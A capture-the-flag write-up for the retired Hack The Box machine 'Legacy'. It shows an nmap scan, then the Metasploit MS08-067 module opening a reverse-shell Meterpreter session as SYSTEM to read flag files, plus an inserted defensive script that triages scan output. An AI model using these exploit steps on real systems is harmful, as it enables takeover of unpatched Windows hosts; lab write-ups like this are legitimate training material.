HTB: Legacy – Writeup


This machine is Legacy from Hack The Box, and is a retired machine. Its IP was

Recon Phase

Start by looking for services

root@kali:~# nmap -T4 -sV
Starting Nmap 7.70 ( ) at 2019-02-09 23:49 GMT
Nmap scan report for
Host is up (0.034s latency).
Not shown: 997 filtered ports
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
Service detection performed. Please report any incorrect results at .
Nmap done: 1 IP address (1 host up) scanned in 11.74 seconds
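
The same scan output read from the defender's side, as an added example that is not part of the original writeup: a short triage script that parses nmap's normal text output and flags hosts pairing an end-of-support Windows CPE with reachable SMB, the combination reported above. The sample address, the `EOL_OS` set and the severity labels are assumptions made for illustration.

```python
import re

# Constructed sample in the same shape as the scan above; the address is a
# documentation-range placeholder, not the lab machine's.
SAMPLE_SCAN = """\
Nmap scan report for 192.0.2.10
Host is up (0.034s latency).
Not shown: 997 filtered ports
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Microsoft Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp
"""

PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")
SMB_PORTS = {139, 445}
# Assumption: CPE product names this example treats as end-of-support.
EOL_OS = {"windows_xp", "windows_2000", "windows_server_2003"}

def parse_scan(text):
    """Return {host: {"ports": [(port, proto, state, service, version)], "os": set()}}."""
    hosts, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Nmap scan report for"):
            current = hosts.setdefault(line.split()[-1].strip("()"), {"ports": [], "os": set()})
        elif current is None:
            continue
        elif (m := PORT_RE.match(line)):
            current["ports"].append((int(m[1]), m[2], m[3], m[4], m[5].strip()))
        elif line.startswith("Service Info:"):
            # Keep only the product field of each OS CPE (cpe:/o:vendor:product).
            current["os"].update(re.findall(r"cpe:/o:[\w.\-]+:([\w.\-]+)", line))
    return hosts

def triage(hosts):
    """Flag hosts with open SMB ports and/or an end-of-support OS fingerprint."""
    findings = []
    for host, data in hosts.items():
        smb = sorted(p for p, _proto, state, _svc, _ver in data["ports"]
                     if state == "open" and p in SMB_PORTS)
        eol = sorted(data["os"] & EOL_OS)
        if not smb and not eol:
            continue
        severity = "critical" if smb and eol else "review"
        findings.append({"host": host, "severity": severity, "smb_ports": smb, "eol_os": eol})
    return findings

if __name__ == "__main__":
    print(triage(parse_scan(SAMPLE_SCAN)))
```
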


A quick Google search led me to MS08-067, and although I'm normally against Metasploit, this time it was worth it.

root@kali:~# msfconsole
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(windows/smb/ms08_067_netapi) > options
Module options (exploit/windows/smb/ms08_067_netapi):
   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)
Exploit target:
   Id  Name
   --  ----
   0   Automatic Targeting
msf exploit(windows/smb/ms08_067_netapi) > set RHOST
msf exploit(windows/smb/ms08_067_netapi) > exploit
[*] Started reverse TCP handler on
[*] - Automatically detecting the target...
[*] - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to
[*] Meterpreter session 1 opened ( -> at 2019-02-10 00:29:03 +0000
meterpreter >

And that's a Meterpreter shell.

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

It's system, just need to grab the flags

meterpreter > pwd
C:\documents and settings\john\Desktop
meterpreter > dir
Listing: C:\documents and settings\john\Desktop
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:19:49 +0000  user.txt
meterpreter > cat user.txt

Now for system

meterpreter > cd '\Documents and Settings\Administrator\Desktop'
meterpreter > dir
Listing: C:\Documents and Settings\Administrator\Desktop
Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-03-16 06:18:50 +0000  root.txt
meterpreter > cat root.txt

Well... that was easy...
